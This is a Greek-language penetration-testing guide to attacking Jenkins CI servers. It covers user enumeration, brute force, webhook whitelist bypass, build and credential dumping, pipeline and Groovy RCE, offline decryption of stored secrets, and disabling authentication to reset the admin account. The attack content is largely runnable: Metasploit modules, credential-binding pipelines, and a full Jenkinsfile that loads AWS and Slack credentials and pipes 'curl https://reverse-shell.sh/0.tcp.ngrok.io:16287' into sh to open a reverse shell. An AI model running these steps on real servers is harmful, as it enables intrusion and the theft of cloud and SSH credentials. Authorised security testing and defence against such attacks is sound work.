Jenkins Security

Basic Information

Jenkins είναι ένα εργαλείο που προσφέρει μια απλή μέθοδο για τη δημιουργία ενός continuous integration ή continuous delivery (CI/CD) περιβάλλοντος για σχεδόν οποιονδήποτε συνδυασμό γλωσσών προγραμματισμού και αποθετηρίων πηγαίου κώδικα χρησιμοποιώντας pipelines. Επιπλέον, αυτοματοποιεί διάφορες ρουτίνες ανάπτυξης. Ενώ το Jenkins δεν εξαλείφει την ανάγκη δημιουργίας scripts για μεμονωμένα βήματα, παρέχει μια ταχύτερη και πιο αξιόπιστη μέθοδο για την ενσωμάτωση ολόκληρης της ακολουθίας εργαλείων κατασκευής, δοκιμής και ανάπτυξης από ό,τι μπορεί κανείς να κατασκευάσει εύκολα χειροκίνητα.

Unauthenticated Enumeration

Για να αναζητήσετε ενδιαφέροντες σελίδες Jenkins χωρίς αυθεντικοποίηση όπως (/people ή /asynchPeople, αυτή η λίστα περιλαμβάνει τους τρέχοντες χρήστες) μπορείτε να χρησιμοποιήσετε:

msf> use auxiliary/scanner/http/jenkins_enum

Ελέγξτε αν μπορείτε να εκτελέσετε εντολές χωρίς να χρειάζεται αυθεντικοποίηση:

msf> use auxiliary/scanner/http/jenkins_command

Χωρίς διαπιστευτήρια μπορείτε να κοιτάξετε μέσα στο /asynchPeople/ path ή /securityRealm/user/admin/search/index?q= για ονόματα χρηστών.

Μπορείτε να αποκτήσετε την έκδοση του Jenkins από το path /oops ή /error

Γνωστές Ευπάθειες

GitHub - gquere/pwn_jenkins: Notes about attacking Jenkins serversGitHub

Σύνδεση

Στις βασικές πληροφορίες μπορείτε να ελέγξετε όλους τους τρόπους σύνδεσης μέσα στο Jenkins:

Εγγραφή

Θα μπορείτε να βρείτε παραδείγματα Jenkins που επιτρέπουν να δημιουργήσετε έναν λογαριασμό και να συνδεθείτε σε αυτόν. Όσο απλό και αν ακούγεται.

Σύνδεση SSO

Επίσης, αν η λειτουργικότητα SSO/πρόσθετα ήταν παρούσα, τότε θα πρέπει να προσπαθήσετε να συνδεθείτε στην εφαρμογή χρησιμοποιώντας έναν δοκιμαστικό λογαριασμό (π.χ., έναν δοκιμαστικό λογαριασμό Github/Bitbucket). Κόλπο από εδώ.

Bruteforce

Jenkins στερείται πολιτικής κωδικών πρόσβασης και μετριασμού brute-force ονομάτων χρηστών. Είναι απαραίτητο να brute-force τους χρήστες καθώς αδύναμοι κωδικοί πρόσβασης ή ονόματα χρηστών ως κωδικοί πρόσβασης μπορεί να είναι σε χρήση, ακόμη και αντίστροφα ονόματα χρηστών ως κωδικοί πρόσβασης.

msf> use auxiliary/scanner/http/jenkins_login

Password spraying

Use this python script or this powershell script.

IP Whitelisting Bypass

Πολλές οργανώσεις συνδυάζουν SaaS-based source control management (SCM) systems όπως το GitHub ή το GitLab με μια εσωτερική, self-hosted CI λύση όπως το Jenkins ή το TeamCity. Αυτή η ρύθμιση επιτρέπει στα CI συστήματα να λαμβάνουν webhook events από SaaS source control vendors, κυρίως για την ενεργοποίηση pipeline jobs.

Για να το επιτύχουν αυτό, οι οργανώσεις whitelist τις IP ranges των SCM platforms, επιτρέποντάς τους να έχουν πρόσβαση στο internal CI system μέσω webhooks. Ωστόσο, είναι σημαντικό να σημειωθεί ότι οποιοσδήποτε μπορεί να δημιουργήσει έναν λογαριασμό στο GitHub ή το GitLab και να τον ρυθμίσει ώστε να ενεργοποιεί ένα webhook, πιθανώς στέλνοντας αιτήματα στο internal CI system.

Check: https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/

Internal Jenkins Abuses

Σε αυτά τα σενάρια θα υποθέσουμε ότι έχετε έναν έγκυρο λογαριασμό για πρόσβαση στο Jenkins.

For more information check the basic information:

Listing users

Αν έχετε αποκτήσει πρόσβαση στο Jenkins, μπορείτε να καταγράψετε άλλους καταχωρημένους χρήστες στο http://127.0.0.1:8080/asynchPeople/

Dumping builds to find cleartext secrets

Use this script to dump build console outputs and build environment variables to hopefully find cleartext secrets.

python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
gitleaks detect --no-git -v

Κλοπή Διαπιστευτηρίων SSH

Εάν ο συμβιβασμένος χρήστης έχει αρκετά δικαιώματα για να δημιουργήσει/τροποποιήσει έναν νέο κόμβο Jenkins και τα διαπιστευτήρια SSH είναι ήδη αποθηκευμένα για πρόσβαση σε άλλους κόμβους, θα μπορούσε να κλέψει αυτά τα διαπιστευτήρια δημιουργώντας/τροποποιώντας έναν κόμβο και ορίζοντας έναν διακομιστή που θα καταγράψει τα διαπιστευτήρια χωρίς να επαληθεύσει το κλειδί του διακομιστή:

Συνήθως θα βρείτε τα διαπιστευτήρια ssh του Jenkins σε έναν παγκόσμιο πάροχο (/credentials/), οπότε μπορείτε επίσης να τα εκφορτώσετε όπως θα εκφορτώνατε οποιοδήποτε άλλο μυστικό. Περισσότερες πληροφορίες στην Ενότητα Εκφόρτωσης μυστικών.

RCE στο Jenkins

Η απόκτηση ενός shell στον διακομιστή Jenkins δίνει στον επιτιθέμενο την ευκαιρία να διαρρεύσει όλα τα μυστικά και μεταβλητές περιβάλλοντος και να εκμεταλλευτεί άλλες μηχανές που βρίσκονται στο ίδιο δίκτυο ή ακόμα και να συγκεντρώσει διαπιστευτήρια cloud.

Από προεπιλογή, το Jenkins θα τρέχει ως SYSTEM. Έτσι, η συμβιβασμένη του κατάσταση θα δώσει στον επιτιθέμενο δικαιώματα SYSTEM.

RCE Δημιουργία/Τροποποίηση έργου

Η δημιουργία/τροποποίηση ενός έργου είναι ένας τρόπος για να αποκτήσετε RCE πάνω στον διακομιστή Jenkins:

RCE Εκτέλεση σεναρίου Groovy

Μπορείτε επίσης να αποκτήσετε RCE εκτελώντας ένα σενάριο Groovy, το οποίο μπορεί να είναι πιο διακριτικό από τη δημιουργία ενός νέου έργου:

RCE Δημιουργία/Τροποποίηση Pipeline

Μπορείτε επίσης να αποκτήσετε RCE δημιουργώντας/τροποποιώντας ένα pipeline:

Εκμετάλλευση Pipeline

Για να εκμεταλλευτείτε τα pipelines, πρέπει ακόμα να έχετε πρόσβαση στο Jenkins.

Δημιουργία Pipelines

Pipelines μπορούν επίσης να χρησιμοποιηθούν ως μηχανισμός κατασκευής σε έργα, σε αυτή την περίπτωση μπορεί να ρυθμιστεί ένα αρχείο μέσα στο αποθετήριο που θα περιέχει τη σύνταξη του pipeline. Από προεπιλογή χρησιμοποιείται το /Jenkinsfile:

Είναι επίσης δυνατή η αποθήκευση αρχείων ρύθμισης pipeline σε άλλες τοποθεσίες (σε άλλα αποθετήρια για παράδειγμα) με στόχο την διαχωριστική πρόσβαση στο αποθετήριο και την πρόσβαση στο pipeline.

Εάν ένας επιτιθέμενος έχει δικαιώματα εγγραφής σε αυτό το αρχείο, θα είναι σε θέση να τροποποιήσει και πιθανώς να ενεργοποιήσει το pipeline χωρίς καν να έχει πρόσβαση στο Jenkins. Είναι πιθανό ο επιτιθέμενος να χρειαστεί να παρακάμψει κάποιες προστασίες κλάδου (ανάλογα με την πλατφόρμα και τα δικαιώματα του χρήστη, αυτές μπορεί να παρακαμφθούν ή όχι).

Οι πιο συνηθισμένοι ενεργοποιητές για την εκτέλεση ενός προσαρμοσμένου pipeline είναι:

• Αίτημα έλξης προς τον κύριο κλάδο (ή πιθανώς προς άλλους κλάδους)

• Προώθηση στον κύριο κλάδο (ή πιθανώς προς άλλους κλάδους)

• Ενημέρωση του κύριου κλάδου και αναμονή μέχρι να εκτελεστεί με κάποιο τρόπο

RCE Pipeline

Στην προηγούμενη ενότητα RCE, είχε ήδη υποδειχθεί μια τεχνική για να αποκτήσετε RCE τροποποιώντας ένα pipeline.

Έλεγχος Μεταβλητών Περιβάλλοντος

Είναι δυνατή η δήλωση μεταβλητών περιβάλλοντος σε καθαρό κείμενο για ολόκληρο το pipeline ή για συγκεκριμένα στάδια. Αυτές οι μεταβλητές περιβάλλοντος δεν θα πρέπει να περιέχουν ευαίσθητες πληροφορίες, αλλά ένας επιτιθέμενος θα μπορούσε πάντα να ελέγξει όλες τις ρυθμίσεις του pipeline/Jenkinsfiles:

pipeline {
agent {label 'built-in'}
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {

Dumping secrets

Για πληροφορίες σχετικά με το πώς συνήθως αντιμετωπίζονται τα μυστικά από τον Jenkins, ρίξτε μια ματιά στις βασικές πληροφορίες:

Οι πιστοποιήσεις μπορούν να είναι περιορισμένες σε παγκόσμιους παρόχους (/credentials/) ή σε συγκεκριμένα έργα (/job/<project-name>/configure). Επομένως, για να εξάγετε όλα αυτά, πρέπει να συμβιβάσετε τουλάχιστον όλα τα έργα που περιέχουν μυστικά και να εκτελέσετε προσαρμοσμένες/μολυσμένες ροές εργασίας.

Υπάρχει ένα άλλο πρόβλημα, για να αποκτήσετε ένα μυστικό μέσα στο env μιας ροής εργασίας, πρέπει να γνωρίζετε το όνομα και τον τύπο του μυστικού. Για παράδειγμα, αν προσπαθήσετε να φορτώσετε ένα usernamePassword μυστικό ως string μυστικό, θα λάβετε αυτό το σφάλμα:

ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected

Εδώ έχετε τον τρόπο να φορτώσετε μερικούς κοινούς τύπους μυστικών:

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
sh '''
env #Search for USERNAME and PASS
'''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
sh '''
env #Search for SECRET
'''
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
sh '''
env # Search for USERPASS
'''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
env
'''
}

Στο τέλος αυτής της σελίδας μπορείτε να βρείτε όλους τους τύπους διαπιστευτηρίων: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

Triggers

Από την τεκμηρίωση: Η οδηγία triggers ορίζει τους αυτοματοποιημένους τρόπους με τους οποίους η Pipeline θα πρέπει να επαναληφθεί. Για Pipelines που είναι ενσωματωμένες με μια πηγή όπως το GitHub ή το BitBucket, οι triggers μπορεί να μην είναι απαραίτητοι καθώς η ενσωμάτωσή τους με webhooks πιθανόν να είναι ήδη παρούσα. Οι διαθέσιμοι triggers αυτή τη στιγμή είναι οι cron, pollSCM και upstream.

Παράδειγμα cron:

triggers { cron('H */4 * * 1-5') }

Check other examples in the docs.

Nodes & Agents

A Jenkins instance might have different agents running in different machines. From an attacker perspective, access to different machines means different potential cloud credentials to steal or different network access that could be abuse to exploit other machines.

For more information check the basic information:

You can enumerate the configured nodes in /computer/, you will usually find the Built-In Node (which is the node running Jenkins) and potentially more:

It is συγκεκριμένα ενδιαφέρον να συμβιβαστεί ο Built-In node γιατί περιέχει ευαίσθητες πληροφορίες Jenkins.

To indicate you want to run the pipeline in the built-in Jenkins node you can specify inside the pipeline the following config:

pipeline {
agent {label 'built-in'}

Πλήρες παράδειγμα

Pipeline σε έναν συγκεκριμένο πράκτορα, με έναν cron trigger, με μεταβλητές περιβάλλοντος pipeline και stage, φορτώνοντας 2 μεταβλητές σε ένα βήμα και στέλνοντας ένα reverse shell:

pipeline {
agent {label 'built-in'}
triggers { cron('H */4 * * 1-5') }
environment {
GENERIC_ENV_VAR = "Test pipeline ENV variables."
}

stages {
stage("Build") {
environment {
STAGE_ENV_VAR = "Test stage ENV variables."
}
steps {
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
'''
}
}
}

post {
always {
cleanWs()
}
}
}

Αυθαίρετη Ανάγνωση Αρχείων σε RCE

RCE

Μετά την Εκμετάλλευση

Metasploit

msf> post/multi/gather/jenkins_gather

Jenkins Secrets

Μπορείτε να καταγράψετε τα μυστικά προσβάλλοντας το /credentials/ αν έχετε αρκετές άδειες. Σημειώστε ότι αυτό θα καταγράψει μόνο τα μυστικά μέσα στο αρχείο credentials.xml, αλλά τα αρχεία διαμόρφωσης κατασκευής μπορεί επίσης να έχουν περισσότερα διαπιστευτήρια.

Αν μπορείτε να δείτε τη διαμόρφωση κάθε έργου, μπορείτε επίσης να δείτε εκεί τα ονόματα των διαπιστευτηρίων (μυστικών) που χρησιμοποιούνται για την πρόσβαση στο αποθετήριο και άλλα διαπιστευτήρια του έργου.

From Groovy

From disk

Αυτά τα αρχεία είναι απαραίτητα για να αποκρυπτογραφήσετε τα μυστικά του Jenkins:

• secrets/master.key

• secrets/hudson.util.Secret

Τέτοια μυστικά μπορούν συνήθως να βρεθούν σε:

• credentials.xml

• jobs/.../build.xml

• jobs/.../config.xml

Ακολουθεί μια regex για να τα βρείτε:

# Find the secrets
grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
# Print only the filenames where the secrets are located
grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"

# Secret example
credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>

Αποκρυπτογράφηση μυστικών Jenkins εκτός σύνδεσης

Εάν έχετε εξάγει τα απαραίτητα κωδικούς πρόσβασης για την αποκρυπτογράφηση των μυστικών, χρησιμοποιήστε αυτό το σενάριο για να αποκρυπτογραφήσετε αυτά τα μυστικά.

python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
06165DF2-C047-4402-8CAB-1C8EC526C115
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT

Αποκρυπτογράφηση μυστικών Jenkins από Groovy

println(hudson.util.Secret.decrypt("{...}"))

Δημιουργία νέου διαχειριστή

1. Πρόσβαση στο αρχείο Jenkins config.xml στο /var/lib/jenkins/config.xml ή C:\Program Files (x86)\Jenkins\

2. Αναζητήστε τη λέξη <useSecurity>true</useSecurity> και αλλάξτε τη λέξη true σε false.

3. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml

4. Επανεκκινήστε τον Jenkins server: service jenkins restart

5. Τώρα πηγαίνετε ξανά στην πύλη Jenkins και ο Jenkins δεν θα ζητήσει καμία πιστοποίηση αυτή τη φορά. Πλοηγηθείτε στο "Manage Jenkins" για να ρυθμίσετε ξανά τον κωδικό πρόσβασης διαχειριστή.

6. Ενεργοποιήστε ξανά την ασφάλεια αλλάζοντας τις ρυθμίσεις σε <useSecurity>true</useSecurity> και επανεκκινήστε ξανά τον Jenkins.

Αναφορές

• https://github.com/gquere/pwn_jenkins

• https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/

• https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

• https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html

• https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072

• https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3